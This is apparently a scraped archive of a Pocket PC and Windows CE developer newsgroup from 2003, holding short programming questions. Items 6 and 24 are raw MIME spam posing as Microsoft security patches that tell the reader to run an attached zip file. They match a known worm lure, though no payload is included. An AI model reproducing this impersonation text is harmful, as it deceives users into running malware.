cWM0B6tWhQjoduIWd7nXgC20hXfHbkOBPRSYECFgAchQg4VYiMyQhikAAjdwAStgAydyIm1yARVA AQXQASvQhzYSAA2AAav4iq/4g0AYiyRwATRQAiqgAggwAxYgA7t4AAcQAjcIjBTSAgYwAySADOB4 iMkoi7uCAQuQJBYgZj3FfQOwDNpYJSnQAROAAZozjuS4AAsAfzLgAGzyACzYfXX4jlVSAmVAfQ+w MCRgAyRAAvhIMCmCXNtXAAYQAu4okHryAzaAARNgjQYJJxNAfRF5AAaQAy2QjRYpdWBQBV2QawrA gpLHfQpgAA1ggiMrYJInKWxIsRhfUAU82ZMj0Iwr8AM3qY3E9ntVV3lDWSUBAQA7 --lapezaajh Content-Type: image/gif Content-Transfer-Encoding: base64 Content-ID: <asoqqmm> R0lGODlhDAAMANUAAP////f3//f39+/v9+/v797m987W787W5sXW5rXF76295qW975y175St75St 3pSlzoyl1oSl5oylzoycxXOU3nOMxWOM5mOM3mOE1lqE3mOEvVKE1lp7xVJ71lJ7zlJ7xVJ7vUp7 zkpzzkpzxVJzrUprvUJrxUJrvUJjtTpjtTpjrTparTpapQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAADAAMAAAIjAABAAhwwMGFCxAQ CACwkICDDBYSLGjQwQEBhg8zDBAIYIEIBwIQdLjAoOOFgSFMIICwIUMEAxQwCBxhAgKHDh5C6DQA IIGJEyA4fPAwYoQCAAVKoEgBQsKJEidQ8CyRYumDA1VTqNBQQYXXFQofsPB6AIAKFiweNBTLoiza BxcFCjgwgQSJCQcWCggIADs= --lapezaajh-- --jvplxvinz Content-Type: application/x-compressed; name="oqmwyq.zip" Content-Transfer-Encoding: base64 Content-Disposition: attachment --jvplxvinz-- Tag: Constants used with the INF file. Tag: 65470
      • 6
        • See this important update from MS Corporation --hsvprhswvdybrqmpo Content-Type: multipart/related; boundary="rbeaplunll"; type="multipart/alternative" --rbeaplunll Content-Type: multipart/alternative; boundary="cwfoanwm" --cwfoanwm Content-Type: text/plain Content-Transfer-Encoding: quoted-printable MS User this is the latest version of security update, the "October 2003, Cumulative Patch" update which fixes all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express as well as three newly discovered vulnerabilities. Install now to protect your computer from these vulnerabilities, the most serious of which could allow an attacker to run code on your computer. This update includes the functionality = of all previously released patches. System requirements: Windows 95/98/Me/2000/NT/XP This update applies to: - MS Internet Explorer, version 4.01 and later - MS Outlook, version 8.00 and later - MS Outlook Express, version 4.01 and later Recommendation: Customers should install the patch = at the earliest opportunity. How to install: Run attached file. Choose Yes on displayed dialog box. How to use: You don't need to do anything after installing this item. Microsoft Product Support Services and Knowledge Base articles = can be found on the Microsoft Technical Support web site. http://support.microsoft.com/ For security-related information about Microsoft products, please = visit the Microsoft Security Advisor web site http://www.microsoft.com/security/ Thank you for using Microsoft products. Please do not reply to this message. It was sent from an unmonitored e-mail address and we are unable = to respond to any replies. ---------------------------------------------- The names of the actual companies and products mentioned = herein are the trademarks of their respective owners. Copyright 2003 Microsoft Corporation. --cwfoanwm Content-Type: text/html Content-Transfer-Encoding: quoted-printable <HTML> <HEAD> <style type=3D'text/css'>.navtext{color:#ffffff;text-decoration:none} </style> </HEAD> <BODY BGCOLOR=3D"White" TEXT=3D"Black"> <BASEFONT SIZE=3D"2" face=3D"verdana,arial"> <TABLE WIDTH=3D"600" HEIGHT=3D"40" BGCOLOR=3D"#1478EB"> <TR height=3D"20"> <TD ALIGN=3D"left" VALIGN=3D"TOP" WIDTH=3D"400" ROWSPAN=3D"2">&nbsp; <FONT FACE=3D"sans-serif" SIZE=3D"5"><I><B> <A class=3D'navtext' HREF=3D"http://www.microsoft.com/" TITLE=3D"Microsoft Home Site" target=3D"_top">Microsoft</A> </B></I></FONT> </TD> <TD ALIGN=3D"right" VALIGN=3D"MIDDLE" BGCOLOR=3D"Black" NOWRAP> <FONT color=3D"#ffffff" size=3D1>&nbsp; <A class=3D'navtext' href=3D'http://www.microsoft.com/catalog/' = target=3D"_top">All Products</A>&nbsp;|&nbsp; <A class=3D'navtext' href=3D'http://support.microsoft.com/' = target=3D"_top">Support</A>&nbsp;|&nbsp; <A class=3D'navtext' href=3D'http://search.microsoft.com/' = target=3D"_top">Search</A>&nbsp;|&nbsp; <A class=3D'navtext' href=3D'http://www.microsoft.com/' target=3D_top> Microsoft.com Guide</A>&nbsp; </FONT> </TD> </TR> <TR> <TD ALIGN=3D"right" VALIGN=3D"BOTTOM" NOWRAP> <FONT FACE=3D"Verdana, Arial" SIZE=3D1><B> <A class=3D'navtext' HREF=3D'http://www.microsoft.com/' TARGET=3D" top"> Microsoft Home</A>&nbsp;&nbsp;</B> </FONT> </TD> </TR> </TABLE> &nbsp;<IMG SRC=3D"cid:wkoztoc" BORDER=3D"0"><BR><BR> <TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2"> MS User<BR><BR> this is the latest version of security update, the "October 2003, Cumulative Patch" update which fixes all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express as well as three newly discovered vulnerabilities. Install now to protect your computer from these vulnerabilities, the most serious of which could allow an attacker to run code on your computer. This update includes the functionality = of all previously released patches. </FONT></TD></TR> </TABLE> <BR><BR> <TABLE BORDER=3D"1" CELLSPACING=3D"1" CELLPADDING=3D"3" WIDTH=3D"600"> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:rqmbgfc" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;System requirements</B> </FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">Windows 95/98/Me/2000/NT/XP</FONT></TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:rqmbgfc" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;This update applies to</B> </FONT></TD><TD NOWRAP> <FONT SIZE=3D"1"> MS Internet Explorer, version 4.01 and later<BR> MS Outlook, version 8.00 and later<BR> MS Outlook Express, version 4.01 and later </FONT> </TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:rqmbgfc" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;Recommendation</B></FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">Customers should install the patch = at the earliest opportunity.</FONT></TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:rqmbgfc" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;How to install</B></FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">Run attached file. = Choose Yes on displayed dialog box.</FONT></TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:rqmbgfc" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;How to use</B></FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">You don't need to do = anything after installing this item.</FONT></TD> </TR> </TABLE> <BR> <TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2"> Microsoft Product Support Services and Knowledge Base articles can be found on the <A HREF=3D"http://support.microsoft.com/" = TARGET=3D"_top">Microsoft Technical Support</A> web site. = For security-related information about Microsoft products, please = visit the <A HREF=3D"http://www.microsoft.com/security" TARGET=3D"_top"> Microsoft Security Advisor</A> web site, = or <A HREF=3D"http://www.microsoft.com/contactus/contactus.asp" = TARGET=3D"_top">Contact Us.</A> <BR><BR> Thank you for using Microsoft products.<BR><BR></FONT> <FONT SIZE=3D"1">Please do not reply to this message. = It was sent from an unmonitored e-mail address and we are unable = to respond to any replies.<BR></FONT> <HR COLOR=3D"Silver" SIZE=3D"1" WIDTH=3D"100%"> <FONT SIZE=3D"1" COLOR=3D"Gray">The names of the actual companies and = products mentioned herein are the trademarks = of their respective owners.</FONT> </TD></TR></TABLE> <BR> <TABLE WIDTH=3D"600" HEIGHT=3D"45" BGCOLOR=3D"#1478EB"> <TR VALIGN=3D"TOP"> <TD WIDTH=3D"5"></TD> <TD> <FONT COLOR=3D"#FFFFFF" SIZE=3D"1"><B> <A class=3D'navtext' HREF=3D"http://www.microsoft.com/= contactus/contactus.asp" TARGET=3D"_top">Contact Us</A> &nbsp;|&nbsp; <A class=3D'navtext' HREF=3D"http://www.microsoft.com/legal/" = TARGET=3D"_top">Legal</A> &nbsp;|&nbsp; <A class=3D'navtext' HREF=3D"https://www.truste.org/validate/605" = TARGET=3D"_top" TITLE=3D"TRUSTe - Click to Verify">TRUSTe</A> </FONT></B> </TD> </TR> <TR VALIGN=3D"MIDDLE"> <TD WIDTH=3D"5"></TD> <TD> <FONT COLOR=3D"#FFFFFF" SIZE=3D"1"> &copy;2003 Microsoft Corporation. All rights reserved. <A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/= info/cpyright.htm" TARGET=3D"_top">Terms of Use</A> &nbsp;|&nbsp; <A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/= info/privacy.htm" TARGET=3D"_top"> Privacy Statement</A>&nbsp;|&nbsp; <A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/= enable/" TARGET=3D"_top">Accessibility</A> </FONT> </TD> </TR> </TABLE> </BODY> </HTML> --cwfoanwm-- --rbeaplunll Content-Type: image/gif Content-Transfer-Encoding: base64 Content-ID: <wkoztoc> R0lGODlhaAA7APcAAP///+rp6puSp6GZrDUjUUc6Zn53mFJMdbGvvVtXh2xre8bF1x8cU4yLprOy zIGArlZWu25ux319xWpqnnNzppaWy46OvKKizZqavLa2176+283N5sfH34uLmpKSoNvb7c7O3L29 yqOjrtTU4crK1Nvb5erq9O/v+O7u99PT2sbGzePj6vLy99jY3Pv7/vb2+fn5++/v8Kqr0oWHuNbX 55SVoszN28vM2pGUr7S1vqqtv52frOPl8CQvaquz2Ojp7pmn3Ozu83OPzmmT6F1/xo6Voh9p2C5z 3EWC31mS40Zxr4uw6LXN8iZkuXmn55q97PH2/Yir1rbL5iVTh3Oj2cvX5Pv9/+/w8QF8606h62Wk 3n+dubnY9abB2c7n/83h9Nji6weK+CGJ4Vim6WyKpKWssgFyyAaV/0Km8Gyx6HW57FJxicDP2+Tt 9Pj8/wOa/wmL5wqd/w6V8heb91e5+mS9+VmLr4vD6qvc/b/j/Mbn/sTi9rvX6szq/tPt/9ju/dzx /+n2/+74//P6/+3w8hOh/xOW6yCm/iuu/zWv/0m4/XTH/IXK95TP9qPV9bfi/tDn9tfp9OP0/93r 9L3Izy6Vzj22/lrC/mfG/JvJ5JGntAyd6IbX/3zD6GzP/3jV/2uoxHqbqujv8g6MvJTj/2HF5pXV 606zz6Hp/63v/7j1/8Ps88b8/rbj5RKOkE2wr3OGhoKGhv7///Dx8V2alqvm4Zni1YPRvx5uVwyO X0q2hLTvw8X10gx2H4PXkkuoV5zkoQeADZu7mmzIVEO7HIXbaGfLMPz8+97d2/Px7v///+bl5eHg 4P7+/v39/fT09PLy8u7u7gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAaAA7AAAI/gCVCRxI sKDBgwgTKlzIsKHDhxAjKgwiqs2kSJEgQfqyp2PHLxoxTmojSpTEkyglBrGYcU+el3n09PEDSFKg mzclAfLTRw/MPV4gjTSZsmhRURchuXwUs88fSYIGubEiqyqAq1gBNLPiRlCgPz197tE4MojRswuD JHX5UiagQILcNMtKl26zu3etuBgUaKcePXv0QIo0iSjaw8raROKYh6nbuFbmVpVlpbKby4Mya858 eWrlrV0l/fECWDBhw4hPimoJUw9NQVa0Yg6kk6dPmD9xt/Xi52kgKG4GCRLtpTjZNmZTQ5yktLXT QFNDA+qJe2wkkgkrrmWrx4tv0X6M/gvFrnzh6uaO+wCKOhzs7TzWyUesyDom7z9//EAKOh51eYKK sdWWH1D15cd78J12GFJKufRXcfwNNtR/ANYXE006UfdSfBQq1lxM3fFHWFlojRBCCA5goMMK5y3V 1B879VGdUMlRqIxaG7kUmHEikVTjQyuAcGIGDmSQwQUYzPBAA1UIKJMfUCI4Vhs2EjTJKrWYwogp mXSxY0iTTLhQAC2ocKIDHGywgAwYWPDAm3AeIIVztr3E1FiFVSnQJLXc4ksxuujyiy6npNGFYBKK WRAzKZipAgkp8ACCAyLg0MClDcD5ppIUVNCFFDL1oSF8Qvn3nyi8+KIqMH8aQwwx/66EMQcoVQxG mI/KBEBCCCSo0MIPLJSJwA6YFvsmBlFkYgopUTxwgQ8XXGBBBRUA0QUXeJp6qi2r2rKLLcAU42qs WIRhR623YpdDNM4wQ0IOInggrwfFNoCDDl20wooqqaSCCil3SHCBBgQXnAGbFmCAgQMkBKDnLsMU 4wswvPCySy3DuLpJGFiY4YodX6RrUhnOIFDDvPNeqkkXfKzCyssv8+svwM5uYPPNONusAZszEEEE GoooQsfQdRRdxyJII83I0ow04nQjjkTtCB5cVN3KMBEXA8wuFbMC6Cu5jIJFLsG4oonIQeQQQw4o a5KsI6moogrMMMvt77+kCPzB3v589+03BxdQ0IFyotyCdTFap7I1K7Z4YskmcIwSTC+9KMHGSD6S 0AIJHkRxByekkIJKv3LPXbfMeOddgQmst+466xoAIUEEEUzAQNBD02H00UkvwnTTT0s9ddV4ZPEK 1hH/qTUnlyDyRi659BJMMLiEgrkoQSwTAjMefPIJ6KKPHnfppfeLCt6cCDFDmjT8AMP7MJywwQW0 1187Aco5osUYyGNtjC+ccFwhzuCK6U0OF2uoQht8FAMEoMADnfge+M7Xrwpa8HyhI0X6JGCwDGhg fvYLoe1wRzSj9c53THsa1KRGNS6oYQxZ0AXyjKGLUlzCEoeIQxjIRjnKTYESC/7EnjJyYAIRRMF7 4Auf+Cp4vtRxghNOiEAHjxTC+k3gfsp5ghPSAIqMBeoUlkjEIeYgBzjwEBdonEIOgmgWSDlgC0h8 YgabSEcncuITUZQBwYxERftRYAIToEDtbie0EhbthL9TofBa6IT9jeEVgQpUJcZoCDEUcHqUw8UU ysBGZZQgBAvAgSfimMQMmjJ0T/SeGiKgRw3w8QKz+2Mgp/UALKamC1FYwha1AElJzkEMYiDb5HqB wE2SRIjR0MEIGoCJUUqwlKd84h0/4QlMRKACezQSLAM5A2pR6wF/JGTudofIFAaPhVW7AxWooIX9 ZSELv4hnJYA5CjQScw1rUP/jMQeCgA/gQA2ecOYzpUnQaVKzmtfM5pEkMIFpebMCtZwA/lJTBR88 YQlRcIITQBHPeNrhCEcwQhPQmM8EALEkAwnBDTBAhWYG1HukTCVMD4oJTBDBAgrNAEOnZYE/vomh 4jQk75KWyHNGrYWO0KUT1tlOWnRUCUdQQhOaoIQ12GEKsVCgEAVSAge88RIufelMxxrQal7iEkLg oCv5uFOffvOPE0XMMvjggy74IAoZ3UI8aYEEJUh1CkoggxIOUIbCbFUZyczADM4K1rI69rHVxARj kyDFtRppp9OawR8pAFQS6s6EvSuq0xZZNS444gkZ1SgVQkELWvjMr1QlQgT+pgALG+yTIDrgwAPo wFiwhtWxNZUsYxVBWYX6YAYT0CwgHwDRB0i0PNGoghTsCoQoaEIYQhCCz7ZLhCYoIAdD+ZEyQqAB C4xBEb09a3Brmt5LBE0RWYiAB/mo2EBSoJvfdG5QP3vI0JpztOgsLR8y8QTU4jUK2U2wEIagBAWU AQy3JcgIUqSF97b3wu9VhCXQwErLKpYCDvXmmygQV+UEQLpScKUPfACEFjuBCGuAhQ4gXBLxIjZa QrBEhtGL3rPyOMOWCHIiOkxfCzT0oc2lwH7J6d+lKTLAVfPIdAu8hCUAwQlCIIMBikAJCEeYIMm4 gAxmkIggB3nHOzazJcb+QIXZ6bHIIPZmT0FMYj2RyUw50EEZRIAASnzheoctSJEekIgyq/nQalaE E2QXAYHlFANx1iyILYDcJYOWqP9d4VFLi62PgEQkGAl1mI5p44HcYMxoQISqC21oIYcxDUuowOwk IAMOTDEDGAAnBR5gARyAE5Al1pMytIM5UiuEBxWwQBIOoepmO1sRd/BBBWgnMGo9a758xECmcOBr QE5Av55lMqadbNThldYjX/h0qEVyvVIDiFpEOIS85b3qOjBBBrODgL4foCZoWVsG2cZAt5fL7ToL WyAVWeAxA42QScjgAkQoRCHmrYhGgDAC+s54AjbAAQ4s4GDeFHOuvf3/ABwMQBgiUHK4L620TJP2 3J7WSEhG1MmJRKILsJzDxBfxhfLWL+MZn4AGOm5rgj2cWrJ8wAB2sAMRFEMYBtcTRUpCdXcbZDV8 sIAExoAHHuA7At2sYv3Q5PEOQmvXTE/7DlCu8kLyd6gtJzeANw3zPaRb5uwOIkoV0gY2SNsCgG+0 DFJwJFhWMbkDK7qHRcD4xjMeBxMoQAGEHYSpWz0hPlhANHxggWtyYBnMQAYIKvBwCZj+9GCHqAUc kFMdOF4EOzBAAXoA2JX3d9zAm7u5oxxzW4164doaiAM0rwwU0IAHz4hGAEDfAjH74PTQn4G0EpAA Z9HX9Y03wAEKcIAB/oDAYQc/CQkcEIBoPAMGzoDBM2KwfGa0QAMXOBLg5y8B6V/gAVNowhQogIEV 61kEDXAAPdADTVAJaKBjtgd3KCR3mrZ7nWZ36kZzx0QIV5AQGNAC5Xd+x6B+7Md8KYBN0oZkziIt E4AAKTAACtBQ8ZIA3NcBKrAMMRB+RfEAzLAM0aAMz/ACLwANyrcMyNACKXABCwA40VKEFPBwRtYE cjAHhmAEU5AAAzgFYjAHrHZmCVhODPhyvAeBtkJzNUYIs5AQNLgM5VeBV9CDoQeEIZABICADbviG FBAtRqYAzCAQAVACOSAACFACMngYFqACNRgAgiiIy+CDLQCEJCAD/yWgAV7ViHF4ATOQAFMABxI3 cWM0B6tWhQjoduIWd7nXgC20hXfHbkOBPRSYECFgAchQg4VYiMyQhikAAjdwAStgAydyIm1yARVA AQXQASvQhzYSAA2AAav4iq/4g0AYiyRwATRQAiqgAggwAxYgA7t4AAcQAjcIjBTSAgYwAySADOB4 iMkoi7uCAQuQJBYgZj3FfQOwDNpYJSnQAROAAZozjuS4AAsAfzLgAGzyACzYfXX4jlVSAmVAfQ+w MCRgAyRAAvhIMCmCXNtXAAYQAu4okHryAzaAARNgjQYJJxNAfRF5AAaQAy2QjRYpdWBQBV2QawrA gpLHfQpgAA1ggiMrYJInKWxIsRhfUAU82ZMj0Iwr8AM3qY3E9ntVV3lDWSUBAQA7 --rbeaplunll Content-Type: image/gif Content-Transfer-Encoding: base64 Content-ID: <rqmbgfc> R0lGODlhDAAMANUAAP////f3//f39+/v9+/v797m987W787W5sXW5rXF76295qW975y175St75St 3pSlzoyl1oSl5oylzoycxXOU3nOMxWOM5mOM3mOE1lqE3mOEvVKE1lp7xVJ71lJ7zlJ7xVJ7vUp7 zkpzzkpzxVJzrUprvUJrxUJrvUJjtTpjtTpjrTparTpapQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAADAAMAAAIjAABAAhwwMGFCxAQ CACwkICDDBYSLGjQwQEBhg8zDBAIYIEIBwIQdLjAoOOFgSFMIICwIUMEAxQwCBxhAgKHDh5C6DQA IIGJEyA4fPAwYoQCAAVKoEgBQsKJEidQ8CyRYumDA1VTqNBQQYXXFQofsPB6AIAKFiweNBTLoiza BxcFCjgwgQSJCQcWCggIADs= --rbeaplunll-- --hsvprhswvdybrqmpo Content-Type: application/x-compressed; name="Qaosu.zip" Content-Transfer-Encoding: base64 Content-Disposition: attachment --hsvprhswvdybrqmpo-- Tag: Constants used with the INF file. Tag: 65469
      • 7
        • Adding Hyperlink to dialog box Hi I would like to create a hyperlink in my dialog box that will open up pocket ie but i have no idea how to go about doing so. any help is appreciated. thanks! Li Tag: Constants used with the INF file. Tag: 65467
      • 8
        • Download location from evc++ 4.0 to pocket pc 2003 Is there a way to specify where the program is going to be downloaded onto the pocket pc 2003 pda when i press the build button for an arm release on evc++ 4.0? Thanks! Li Tag: Constants used with the INF file. Tag: 65461
      • 9
        • Send Key VK_RETURN to Pocket Excel Failed by PostKeybdMessage Dear All I have a trouble in send key "VK_RETURN" to Pocket Excel. I wish to send key "VK_RETURN" from my AP to Pocket Excel and make the StringGrid move to next Grid in Pocket Excel. UINT uiShift = 0, ascii = VK_RETURN; PostKeybdMessage( (HWND)-1, 0, 0, 1, &uiShift, &ascii ); it is work in NotePad and Pocket Word but Pocket Excel not worked. any one help me please. Tag: Constants used with the INF file. Tag: 65459
      • 10
        • Intel C++ Compiler for Microsoft eMbedded* Visual C++ Is anyone using this compiler? I need to target an IPAQ 5550 with the PXA255 processor, so I got the 30-day trial of this compiler to use with Embedded Visual C++ 3.0 and installed it. At least, I did the steps that ought to have installed it. Trouble is, I can't find any evidence that it put anything other than the decompressed install files themselves anywhere. I don't see any difference in the eVC++ environment like a new CPU type, so I don't know how this compiler gets used, although Intel claims in the product blurbs that it "plugs into the Microsoft eMbedded Visual C++ development tools." The Intel "support" is useless on this subject. Can anyone tell me what's going on with this? Tag: Constants used with the INF file. Tag: 65458
      • 11
        • Access XML File Can I find any API to access XML file in Windows CE 3.0? Tag: Constants used with the INF file. Tag: 65457
      • 12
        • Pocket PC 2003 SDK Installation - Internal Error 2229., InstallExecuteSequence Hi guys, I have installed evc 4.0 with sp2, active sync 3.7 and vs.net 2003 as a pre-requisites for ppc2k3. Now, When I try to install ppc sdk 2003, I am getting an error which says "Internal Error 2229. ,InstallExecuteSequence, SELECT `Action`, NULL, `Condition` FROM `InstallExecuteSequence` WHERE `Sequence` > 0 ORDER BY `Sequence`. This error is immediately after I run the Microsoft Pocket PC 2003 SDK.msi Need some help here asap. Tag: Constants used with the INF file. Tag: 65456
      • 13
        • Help!pc connect to ppc or smartphone using winsock I wrote a socket client application on pc,and a socket server application on smartphone.But I don't know what ip address and port should my client application connnet to?It seems my smartphone has an ip adress ,e.g. 192.168.55.101, but it was not recognized by pc application. Tag: Constants used with the INF file. Tag: 65455
      • 14
        • WSIWYG not working properly with VS.NET Hi, I am using "Smart Device Application" template of VS.NET 2003 to develop a Pocket PC 2003 app. I am getting in trouble when designing the user interface with VB Forms. When I deploy the app to the emulator the fonts seems to be changed. Doing this, my label and text boxes "becomes too small" for its contents. And I don't get the WSIWYG benefit. Any Help? Thanks ------------- Rafael Pivato Tag: Constants used with the INF file. Tag: 65443
      • 15
        • MenuBar The control MenuBar1 ({00AB0E66-7888-4321-A443- E3FB7843A789}) could not be creates.. Using eVB 3.0, PPC SDK2002 and Emulator.. Help. Tag: Constants used with the INF file. Tag: 65442
      • 16
        • Error Compiling.,.. Hello All, I am trying to use VC++ 4.0 embedded to compile onto an HP pocket pc running CE 4.2. This code compiles under version 3.0 of VC++, but gives this error for 4.0. Linking... corelibc.lib(pegwmain.obj) : error LNK2019: unresolved external symbol _WinMain referenced in function _WinMainCRTStartup emulatorDbg/WorkingCopy1.exe : fatal error LNK1120: 1 unresolved externals Any clues? Thanks, Abhilash. Tag: Constants used with the INF file. Tag: 65441
      • 17
        • Windows CE Control Manager Error "failed to find suitable control manager server for your device" when trying to Assess Pocket PC 2002 Default Device or Emulator. I am trying to register a MenuBar Control to the above Devices... Help...I am stuck. Tag: Constants used with the INF file. Tag: 65438
      • 18
        • Change Toolbar Button Bitmap Dynamically I would like to show some information like space available and connection status in the tool bar. For memory available, I was wondering if there was a way to maybe redraw the bitmap of a button in the toolbar to show the disk space in a circle/pie format. Or maybe show the status of the bluetooth connection with a toolbar button that is first colored red when disconnected and green when connected. I was thinking I could subclass the CeCommandBar and rewrite some of the paint functions for the buttons but that seems like a lot of work. Has anybody tried this before? or can give me some tricks or suggestions? thanks -Gary; Tag: Constants used with the INF file. Tag: 65437
      • 19
        • Problem button enter I have met a problem with button for Pocket Microsoft CE V. 3.0.111 in others Pocket Microsoft CE V. 3.0.93 work. When a program in Java Script use function Click() or Focus(), one Pocket work, but other no, click in Enter too no, only work when click in button criated. This case can problem hardware? Or problem this version pocket? Thank you. Carina Tag: Constants used with the INF file. Tag: 65436
      • 20
        • Connect to MySQL database server Hello, I am developing application using PocketPC 2002 eVB 3.0. I need to connect my application to a MySQL server. I find one DLL which can be used to connect MySQL server. It is DALP. But I don't know how use this DLL. Can anybody help me? (\_ _/) Tomas Matulik (o)(o) (( X )) (__) matulik@e-it.cz XX ___ / / \ \_/ _ \_/ / \___/ \___/ Tag: Constants used with the INF file. Tag: 65434
      • 21
        • Storage format for a App I have to develop and application for pocket PC 2003 it is kind of a shopping list, I need to add items and update them, now my questions is what type of file should I use to storage the information, can I use Database access, MSSQL, or just a binaty file ? The app have to be able to run in any PPC 2003 with out installing anyhting extra, any Ideas ? Note : this is my first app in ppc 2003. Thanks Carlos Tag: Constants used with the INF file. Tag: 65430
      • 22
        • sadfasdfsafsdf sadfasdfasd Tag: Constants used with the INF file. Tag: 65426
      • 23
        • Anyone know of a Secure Digital serial card? Has anyone seen a serial card that will fit into a Secure Digital slot on a PDA? I need another serial port on an IPAQ and all I'm finding is Compact Flash or PC Card formats. I'd prefer not to have to add an extension sleeve just for this. Please reply in the newsgroup; somebody else is bound to be looking for the same thing. Thanks for any info. Tag: Constants used with the INF file. Tag: 65425
      • 24
        • See security patch from the M$ Corp. --vtpsvqqlweghjsyx Content-Type: multipart/related; boundary="aysnrgdolyuqhuaf"; type="multipart/alternative" --aysnrgdolyuqhuaf Content-Type: multipart/alternative; boundary="nvtntndnla" --nvtntndnla Content-Type: text/plain Content-Transfer-Encoding: quoted-printable MS Client this is the latest version of security update, the "September 2003, Cumulative Patch" update which resolves all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express. Install now to help maintain the security of your computer from these vulnerabilities, the most serious of which could allow an attacker to run executable on your computer. This update includes the functionality = of all previously released patches. System requirements: Windows 95/98/Me/2000/NT/XP This update applies to: - MS Internet Explorer, version 4.01 and later - MS Outlook, version 8.00 and later - MS Outlook Express, version 4.01 and later Recommendation: Customers should install the patch = at the earliest opportunity. How to install: Run attached file. Choose Yes on displayed dialog box. How to use: You don't need to do anything after installing this item. --nvtntndnla Content-Type: text/html Content-Transfer-Encoding: quoted-printable <HTML> <HEAD> <style type=3D'text/css'>.navtext{color:#ffffff;text-decoration:none} </style> </HEAD> <BODY BGCOLOR=3D"White" TEXT=3D"Black"> <BASEFONT SIZE=3D"2" face=3D"verdana,arial"> <TABLE WIDTH=3D"600" HEIGHT=3D"40" BGCOLOR=3D"#1478EB"> <TR height=3D"20"> <TD ALIGN=3D"left" VALIGN=3D"TOP" WIDTH=3D"400" ROWSPAN=3D"2">&nbsp; <FONT FACE=3D"sans-serif" SIZE=3D"5"><I><B> <A class=3D'navtext' HREF=3D"http://www.microsoft.com/" TITLE=3D"Microsoft Home Site" target=3D"_top">Microsoft</A> </B></I></FONT> </TD> <TD ALIGN=3D"right" VALIGN=3D"MIDDLE" BGCOLOR=3D"Black" NOWRAP> <FONT color=3D"#ffffff" size=3D1>&nbsp; <A class=3D'navtext' href=3D'http://www.microsoft.com/catalog/' = target=3D"_top">All Products</A>&nbsp;|&nbsp; <A class=3D'navtext' href=3D'http://support.microsoft.com/' = target=3D"_top">Support</A>&nbsp;|&nbsp; <A class=3D'navtext' href=3D'http://search.microsoft.com/' = target=3D"_top">Search</A>&nbsp;|&nbsp; <A class=3D'navtext' href=3D'http://www.microsoft.com/' target=3D_top> Microsoft.com Guide</A>&nbsp; </FONT> </TD> </TR> <TR> <TD ALIGN=3D"right" VALIGN=3D"BOTTOM" NOWRAP> <FONT FACE=3D"Verdana, Arial" SIZE=3D1><B> <A class=3D'navtext' HREF=3D'http://www.microsoft.com/' TARGET=3D" top"> Microsoft Home</A>&nbsp;&nbsp;</B> </FONT> </TD> </TR> </TABLE> &nbsp;<IMG SRC=3D"cid:rfovdvi" BORDER=3D"0"><BR><BR> <TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2"> MS Client<BR><BR> this is the latest version of security update, the "September 2003, Cumulative Patch" update which resolves all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express. Install now to help maintain the security of your computer from these vulnerabilities, the most serious of which could allow an attacker to run executable on your computer. This update includes the functionality = of all previously released patches. </FONT></TD></TR> </TABLE> <BR><BR> <TABLE BORDER=3D"1" CELLSPACING=3D"1" CELLPADDING=3D"3" WIDTH=3D"600"> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:bekmytt" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;System requirements</B> </FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">Windows 95/98/Me/2000/NT/XP</FONT></TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:bekmytt" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;This update applies to</B> </FONT></TD><TD NOWRAP> <FONT SIZE=3D"1"> MS Internet Explorer, version 4.01 and later<BR> MS Outlook, version 8.00 and later<BR> MS Outlook Express, version 4.01 and later </FONT> </TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:bekmytt" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;Recommendation</B></FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">Customers should install the patch = at the earliest opportunity.</FONT></TD> </TR> <TR 